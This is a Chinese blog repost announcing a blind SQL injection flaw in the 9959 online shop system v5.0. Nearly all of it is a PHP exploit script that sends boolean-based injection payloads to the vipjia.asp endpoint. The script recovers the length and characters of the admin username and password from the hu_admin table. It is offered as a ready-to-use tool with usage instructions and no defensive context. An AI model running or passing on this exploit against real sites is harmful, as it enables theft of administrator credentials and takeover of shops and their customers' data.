9959网店系统v5.0 SQL盲注漏洞
以下是利用工具:
<?php
print_r(‘+—————————————————————————+
9959网店系统 v5.0
Blind SQL injection exploit by mendou
05
官方网站: www.9959shop.com+—————————————————————————+
‘);
if ($argc <
2) {print_r(‘
+—————————————————————————+
Usage: php
‘.$argv[0].’ host idExample:
php
‘.$argv[0].’ localhost id+—————————————————————————+
‘);
exit;
}
error_reporting(0);
ini_set(‘max_execution_time’, 0);
$host =
$argv[1];$str =
“abcdefghijklmnopqrstuvwxyz0123456789″;$strlen
=strlen($str);$pid = $argv[2];
$n_len =
lenstr(adminname); //用户长度echo
“用户长度:”.$n_len.”\r\n”;pojie(“adminname”,$n_len);echo “\r\n”;
$p_len =
lenstr(password); //密码长度echo
“密码长度:”.$p_len.”\r\n”;pojie(“password”,$p_len);
function
pojie($str1,$len){global $host,$strlen,$str,$pid;
for
($j=1 ; $j<=$len ; $j++){for ($i=0 ; $i<$strlen ;
$i++){$exp =
“%20and%20(select%20top%201%20mid(“.$str1.”,”.$j.”,1)%20from%20hu_admin)=’”.$str[$i].”‘”;$a =
file_get_contents(‘http://’.$host.’/user/vipjia.asp?action=loads&id=’.$pid.$exp);if
(strpos($a,”次”)==true){echo
$str[$i];break;}
}
}
}
//判断
用户或者密码的长度函数www.2cto.com function lenstr($str){
global
$host,$pid;for ($i=1 ; $i <= 30; $i++){
$exp =
“%20and%20(select%20top%201%20len(“.$str.”)%20from%20hu_admin)=”.$i;$a =
file_get_contents(‘http://’.$host.’/user/vipjia.asp?action=loads&id=’.$pid.$exp);if
(strpos($a,”次”)==true){return $i;
}
}
}
?>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1189.html